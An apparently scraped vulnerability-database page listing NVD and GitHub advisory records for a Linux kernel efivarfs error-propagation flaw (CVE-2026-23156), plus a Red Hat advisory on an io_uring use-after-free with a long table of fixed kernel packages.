| linux | linux_kernel | * | |
| linux | linux_kernel | * | |
| linux | linux_kernel | * | |
| linux | linux_kernel | 6.19 | |
| linux | linux_kernel | 6.19 | |
| linux | linux_kernel | 6.19 | |
| linux | linux_kernel | 6.19 | |
| linux | linux_kernel | 6.19 | |
| linux | linux_kernel | 6.19 | |
| linux | linux_kernel | 6.19 |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"matchCriteriaId": "83DE4E0F-B87E-49B8-B0C7-D01CE9B22054",
"versionEndExcluding": "6.1.162",
"versionStartIncluding": "6.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"matchCriteriaId": "316D8D4E-FE44-4C76-8403-63CAF51EEFC2",
"versionEndExcluding": "6.6.123",
"versionStartIncluding": "6.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"matchCriteriaId": "3F0D11B0-A3DA-4D8F-89B9-CFD2094EBA37",
"versionEndExcluding": "6.12.69",
"versionStartIncluding": "6.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"matchCriteriaId": "171CFCB2-8F49-4F9E-8A67-FAC6BF45B5A2",
"versionEndExcluding": "6.18.9",
"versionStartIncluding": "6.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc1:*:*:*:*:*:*",
"matchCriteriaId": "17B67AA7-40D6-4AFA-8459-F200F3D7CFD1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc2:*:*:*:*:*:*",
"matchCriteriaId": "C47E4CC9-C826-4FA9-B014-7FE3D9B318B2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc3:*:*:*:*:*:*",
"matchCriteriaId": "F71D92C0-C023-48BD-B3B6-70B638EEE298",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc4:*:*:*:*:*:*",
"matchCriteriaId": "13580667-0A98-40CC-B29F-D12790B91BDB",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc5:*:*:*:*:*:*",
"matchCriteriaId": "CAD1FED7-CF48-47BF-AC7D-7B6FA3C065FC",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc6:*:*:*:*:*:*",
"matchCriteriaId": "3EF854A1-ABB1-4E93-BE9A-44569EC76C0D",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc7:*:*:*:*:*:*",
"matchCriteriaId": "F5DC0CA6-F0AF-4DDF-A882-3DADB9A886A7",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nefivarfs: fix error propagation in efivar_entry_get()\n\nefivar_entry_get() always returns success even if the underlying\n__efivar_entry_get() fails, masking errors.\n\nThis may result in uninitialized heap memory being copied to userspace\nin the efivarfs_file_read() path.\n\nFix it by returning the error from __efivar_entry_get()."
},
{
"lang": "es",
"value": "En el kernel de Linux, la siguiente vulnerabilidad ha sido resuelta:\n\nefivarfs: correcci\u00f3n de la propagaci\u00f3n de errores en efivar_entry_get()\n\nefivar_entry_get() siempre devuelve \u00e9xito incluso si la funci\u00f3n subyacente __efivar_entry_get() falla, enmascarando errores.\n\nEsto puede resultar en que memoria de pila no inicializada sea copiada al espacio de usuario en la ruta de efivarfs_file_read().\n\nSe soluciona devolviendo el error desde __efivar_entry_get()."
}
],
"id": "CVE-2026-23156",
"lastModified": "2026-03-18T14:40:43.860",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2026-02-14T16:15:55.760",
"references": [
{
"source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"tags": [
"Patch"
],
"url": "https://git.kernel.org/stable/c/3960f1754664661a970dc9ebbab44ff93a0b4c42"
},
{
"source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"tags": [
"Patch"
],
"url": "https://git.kernel.org/stable/c/4b22ec1685ce1fc0d862dcda3225d852fb107995"
},
{
"source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"tags": [
"Patch"
],
"url": "https://git.kernel.org/stable/c/510a16f1c5c1690b33504052bc13fbc2772c23f8"
},
{
"source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"tags": [
"Patch"
],
"url": "https://git.kernel.org/stable/c/89b8ca709eeeabcc11ebba64806677873a2787a8"
},
{
"source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"tags": [
"Patch"
],
"url": "https://git.kernel.org/stable/c/e4e15a0a4403c96d9898d8398f0640421df9cb16"
}
],
"sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"vulnStatus": "Analyzed",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "NVD-CWE-noinfo"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
GHSA-R6PF-FX8P-436V
Vulnerability from github – Published: 2026-02-14 18:30 – Updated: 2026-03-18 15:30In the Linux kernel, the following vulnerability has been resolved:
efivarfs: fix error propagation in efivar_entry_get()
efivar_entry_get() always returns success even if the underlying __efivar_entry_get() fails, masking errors.
This may result in uninitialized heap memory being copied to userspace in the efivarfs_file_read() path.
Fix it by returning the error from __efivar_entry_get().
{
"affected": [],
"aliases": [
"CVE-2026-23156"
],
"database_specific": {
"cwe_ids": [],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-02-14T16:15:55Z",
"severity": "HIGH"
},
"details": "In the Linux kernel, the following vulnerability has been resolved:\n\nefivarfs: fix error propagation in efivar_entry_get()\n\nefivar_entry_get() always returns success even if the underlying\n__efivar_entry_get() fails, masking errors.\n\nThis may result in uninitialized heap memory being copied to userspace\nin the efivarfs_file_read() path.\n\nFix it by returning the error from __efivar_entry_get().",
"id": "GHSA-r6pf-fx8p-436v",
"modified": "2026-03-18T15:30:40Z",
"published": "2026-02-14T18:30:15Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23156"
},
{
"type": "WEB",
"url": "https://git.kernel.org/stable/c/3960f1754664661a970dc9ebbab44ff93a0b4c42"
},
{
"type": "WEB",
"url": "https://git.kernel.org/stable/c/4b22ec1685ce1fc0d862dcda3225d852fb107995"
},
{
"type": "WEB",
"url": "https://git.kernel.org/stable/c/510a16f1c5c1690b33504052bc13fbc2772c23f8"
},
{
"type": "WEB",
"url": "https://git.kernel.org/stable/c/89b8ca709eeeabcc11ebba64806677873a2787a8"
},
{
"type": "WEB",
"url": "https://git.kernel.org/stable/c/e4e15a0a4403c96d9898d8398f0640421df9cb16"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
RHSA-2026:4012
Vulnerability from csaf_redhat - Published: 2026-03-09 10:02 - Updated: 2026-05-11 02:27A flaw was found in the Linux kernel's io_uring subsystem. A local attacker with low privileges could exploit a use-after-free vulnerability when the `sq->thread` object is prematurely released while still being accessed by the `__io_uring_show_fdinfo()` function. This flaw could lead to privilege escalation, allowing the attacker to execute arbitrary code, disclose sensitive information, or cause a system-wide denial of service.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
